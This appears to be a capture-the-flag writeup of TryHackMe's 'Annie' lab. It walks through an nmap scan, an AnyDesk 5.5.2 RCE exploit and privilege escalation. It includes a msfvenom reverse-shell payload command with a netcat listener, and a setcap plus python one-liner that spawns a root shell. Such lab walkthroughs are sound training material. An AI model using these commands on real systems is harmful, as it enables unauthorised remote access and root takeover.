# Annie Writeup - TryHackMe

## 👋 Introduction

  
Hi there!, Annie is a room in [TryHackme](https://tryhackme.com/room/annie) Rated as Medium. I found it to be easy. Without Further Ado lets Start!  
  

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1715194298127/eea65ee0-e677-48a6-a4dc-96c32df0f445.jpeg align="center")

### 🔍 Enumeration

#### Nmap

As always we do , lets start off with an nmap scan.

```bash
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
	| ssh-hostkey: 
	|   2048 7e:43:5f:1e:58:a8:fc:c9:f7:fd:4b:40:0b:83:79:32 (RSA)
	|   256 5c:79:92:dd:e9:d1:46:50:70:f0:34:62:26:f0:69:39 (ECDSA)
	|_  256 ce:d9:82:2b:69:5f:82:d0:f5:5c:9b:3e:be:76:88:c3 (ED25519)

7070/tcp open  ssl/realserver?
	|_ssl_date:TLS randomness does not represent time.
	|_ssl_cert: Subject: CommonName=AnyDesk Client
Service Info: OS: Linux; CPE: cpe:/o:linux:
```

  
We see that we have two open ports. One being SSH and other being a AnyDesk server in port 7070. from the Caption of this room- "Remote access comes in different flavors." , we get that this room has something to do with Remote access softwares like Anydesk. from searching "AnyDesk Exploits" in Google, we get a RCE exploit for **AnyDesk 5.5.2**, we really doesn't know yet if the box has the vulnerable version. But sometimes it is better to just try it.  

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1715194323403/a06e8414-02a0-4458-83be-20cbabd8c3d7.jpeg align="center")

  
We need to Modify the script in order for it to work, Generate another shellcode using msfvenom (with our THM-ip) and replace the shell code in the exploit with the new one.  
  
`msfvenom -p linux/x64/shell_reverse_tcp LHOST= TRYHACKME_IP_HERE LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode`  
  

### Exploiting AnyDesk:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1715194366162/5b214694-41e5-4a4f-9b08-2c6d133f913f.png align="center")

Setup a NETCAT listener on the port you set on the MSFVENOM. Execute the python script and wait for the connection.  
If the Reverse shell doesn't drop within 2-3 minutes. Reset the machine and try again. (I got it right the second time.)  

#### *Dropped the Shell!*

When you search for SUID files, you find an interesting file as the first result.  

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1715194417147/50e104cc-786f-4a02-abb5-35a70541faa1.png align="center")

  
Setcap is a linux binary which can be used to Give [capabilities](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities) to a another binary. According to the Linux [man page](https://linux.die.net/man/8/setcap):

### *"Setcap sets the capabilities of each specified filename to the capabilities specified.""*

We can Effectively escalate and drop a root shell if we give Python (or any language you know) the capability to set UID.  
  
`annie@desktop:~ /sbin/setcap cap_setuid+ep /usr/share/python3`  
`annie@desktop:~ /usr/share/python3 -c 'import os;os.setuid(0); os.system("/bin/bash")'`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1715194383634/23879cf5-8524-46ce-a70e-8e0d1df74ec3.jpeg align="center")
